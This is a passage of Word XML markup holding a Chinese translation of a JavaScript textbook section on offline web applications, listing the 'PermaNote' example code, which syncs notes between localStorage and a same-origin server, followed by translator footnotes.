      <w:r>
        <w:t>秒，就自动把笔记数据保存到服务器上。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onoffline</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当浏览器进入离线状态时，在状态栏中显示离线消息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ononline</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当浏览器回到在线状态时，同步服务器，检查是否有新版本的数据，并且保存当前版本的数据。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onupdateready</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果新版本的应用（已缓存）准备就绪了，就在状态条中展示消息来告知用户。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onnoupdate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果应用程序缓存没有发生变化，则通知用户他</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>她仍在运行当前版本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>20-7</w:t>
      </w:r>
      <w:r>
        <w:t>展示了</w:t>
      </w:r>
      <w:r>
        <w:t>PermaNote</w:t>
      </w:r>
      <w:r>
        <w:t>应用的事件驱动逻辑的概览：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>20-7</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>permanote.js</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>一些贯穿始终的变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var editor,statusline,savebutton,idletimer;//</w:t>
      </w:r>
      <w:r>
        <w:t>首次载入应用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.onload=function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>第一次载入时，初始化本地存储</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(localStorage.note==null)localStorage.note="";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(localStorage.lastModified==null)localStorage.lastModified=0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage.lastSaved==null)localStorage.lastSaved=0;//</w:t>
      </w:r>
      <w:r>
        <w:t>查找编辑器</w:t>
      </w:r>
      <w:r>
        <w:t>UI</w:t>
      </w:r>
      <w:r>
        <w:t>元素，并初始化全局变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>editor=document.getElementById("editor");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>statusline=document.getElementById("statusline");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>savebutton=document.getElementById("savebutton");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>editor.value=localStorage.note;//</w:t>
      </w:r>
      <w:r>
        <w:t>初始化编辑器，将保存的笔记数据填充为其内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>editor.disabled=true;//</w:t>
      </w:r>
      <w:r>
        <w:t>同步前禁止编辑</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>一旦文本区有内容输入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>editor.addEventListener("input",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function(e){//</w:t>
      </w:r>
      <w:r>
        <w:t>将新的值保存到</w:t>
      </w:r>
      <w:r>
        <w:t>locaStorage</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>localStorage.note=editor.value;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>localStorage.lastModified=Date.now();//</w:t>
      </w:r>
      <w:r>
        <w:t>重置闲置计时器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(idletime</w:t>
      </w:r>
      <w:r>
        <w:t>r)clearTimeout(idletimer);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>idletimer=setTimeout(save,5000);//</w:t>
      </w:r>
      <w:r>
        <w:t>启用保存按钮</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>savebutton.disabled=false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>false);//</w:t>
      </w:r>
      <w:r>
        <w:t>每次载入应用程序时，尝试同步服务器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>sync();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>离开页面前保存数据到服务器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.onbeforeunload=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(localStorage.lastModified</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage.lastSaved)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>save();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>离线时，通知</w:t>
      </w:r>
      <w:r>
        <w:t>用户</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.onoffline=function(){status("Offline");}//</w:t>
      </w:r>
      <w:r>
        <w:t>再次返回在线状态时，进行同步</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.ononline=function(){sync();};//</w:t>
      </w:r>
      <w:r>
        <w:t>当有新版本应用的时候，提醒用户</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这里我们也可以采用</w:t>
      </w:r>
      <w:r>
        <w:t>location.reload()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来强制重新载入应用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.applicationCache.onupdateready=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">status("A new version of this application is </w:t>
      </w:r>
      <w:r>
        <w:t>available.Reload to run it");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>当没有新版本的时候也通知用户</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.applicationCache.onnoupdate=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>status("You are running the latest version of the application.");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>用于在状态栏中显示状态消息的一个函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">function </w:t>
      </w:r>
      <w:r>
        <w:t>status(msg){statusline.innerHTML=msg;}//</w:t>
      </w:r>
      <w:r>
        <w:t>每当笔记内容更新后，如果用户停止编辑超过</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>分钟，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>就会自动将笔记文本上传到服务器（在线状态下）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function save(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(idletimer)clearTimeout(idletimer);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>idletimer=null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(navigator.onLine){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var xhr=new XMLHttpRequest();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>xhr.open("PUT","/note");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>xhr.send(editor.va</w:t>
      </w:r>
      <w:r>
        <w:t>lue);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>xhr.onload=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>localStorage.lastSaved=Date.now();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>savebutton.disabled=true;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检查服务端是否有新版本的笔记，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果没有，则将当前版本保存到服务器端</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function sync(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(navigator.onLine){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var xhr=new XMLHttpRequest();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>xhr.open("GET","/note");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>xhr.send();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>xhr.onload=fun</w:t>
      </w:r>
      <w:r>
        <w:t>ction(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var remoteModTime=0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(xhr.status==200){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var remoteModTime=xhr.getResponseHeader("Last-Modified");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>remoteModTime=new Date(remoteModTime).getTime();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(remoteModTime</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage.lastModified){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>status("Newer note found on server.");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var useit=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>confirm("There is a newer version of the note\n"+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"on the server.Click Ok to use that version\n"+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"or click Cancel to continue editing this\n"+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"version and overwrite the server");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var now=Date.now();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(useit){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>editor.value=localStorage.note=xhr.responseT</w:t>
      </w:r>
      <w:r>
        <w:t>ext;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>localStorage.lastSaved=now;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>status("Newest version downloaded.");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>status("Ignoring newer version of the note.");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>localStorage.lastModified=now;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>status("You are editing the current version of the note.");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(localStorage.lastModified</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage.lastSaved){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>save();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>editor.disabled=false;//</w:t>
      </w:r>
      <w:r>
        <w:t>再次启用编辑器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>editor.focus();//</w:t>
      </w:r>
      <w:r>
        <w:t>将光标定位到编辑器中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{//</w:t>
      </w:r>
      <w:r>
        <w:t>离线状态下，不能同步</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>status("Can't sync while offline");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>editor.disabled=false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>editor.focus();</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4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>类似</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>事件机制。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>完全兼容。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>第三方</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>指的是来自于当前访问站点以为的站点设置的</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>类似于</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>头。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r>
        <w:t>过渡画面类似</w:t>
      </w:r>
      <w:r>
        <w:t>loading</w:t>
      </w:r>
      <w:r>
        <w:t>图。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
